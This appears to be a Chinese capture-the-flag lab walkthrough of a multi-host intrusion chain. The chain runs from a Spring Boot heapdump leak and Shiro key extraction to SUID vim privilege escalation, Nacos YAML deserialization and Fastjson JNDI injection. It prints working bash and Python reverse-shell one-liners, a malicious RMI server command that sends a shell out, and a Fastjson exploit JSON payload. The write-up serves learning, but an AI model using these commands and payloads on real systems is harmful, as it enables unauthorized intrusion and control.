流程

开启靶场之后，用fscan扫描漏洞

8080端口有Spring Boot Actuator heapdump信息泄露漏洞，访问/actuator/heapdump下载到heapdump文件

heapdump 文件（通常扩展名为 .hprof）是 Java 虚拟机（JVM）堆内存的快照文件，记录了某一时刻内存中存储的所有对象、类、线程等信息。它常用于 调试内存泄漏、分析应用运行状态、提取敏感信息。

1	java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

提取heapdump的敏感信息，得到了Shirokey,用shiro一把梭工具(这个工具需要用Java8运行)注入内存马，之后用蚁剑连接

无法读root目录

本地suid提权介绍一下suid提权

1	find / -user root -perm -4000 -print 2>/dev/null

反弹shell

攻击者：nc -lvnp 2333

靶机: bash -i >& /dev/tcp/ip地址/端口 0>&1

python反弹shell命令

web01: python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ip地址”,2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’

获取伪终端 python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

vim.basic提权读flag1 vim.basic /root/flag/flag01.txt

提权到root /usr/bin/vim.basic -c ‘:python3 import os; os.execl(“/bin/sh”, “sh”, “-pc”, “reset; exec sh -p”)’

一个很重要的技巧，拿到一台主机的shell后可以上传公钥用finalshell连接，方便传文件

上传fscan到web01,继续扫

172.30.12.6:8848有nacos，先frp内网穿透挂代理，nacos nacos登录

yaml反序列化

用Nacos漏洞综合利用工具生成恶意jar包(用java8打包)

因为172.30.12.6不出网，不能上传jar包，所以把yaml-payload.jar传到web01并开启http服务，NacosExploitGUI_v4.0利用漏洞

修改文件新增一个用户并加入管理员组，远程桌面连接找到flag2

当时一直登录不成功，没明白原因

接下来是172.30.12.236，bp要挂代理才能抓包

username和password是json格式

jndi_tool工具

1
2

java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 “bash -i >& /dev/tcp/172.30.12.5/9595 0>&1”
使用jndi_tool.jar搭建一个恶意 RMI 服务器，当目标触发 JNDI 注入漏洞时，将会反弹一个 Shell 到攻击者的服务器，在web01上运行上面的命令，同时监听 nc -lvnp 9595

同时用bp将json改为

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://172.30.12.5:8888/Object",
        "autoCommit":true
    }
}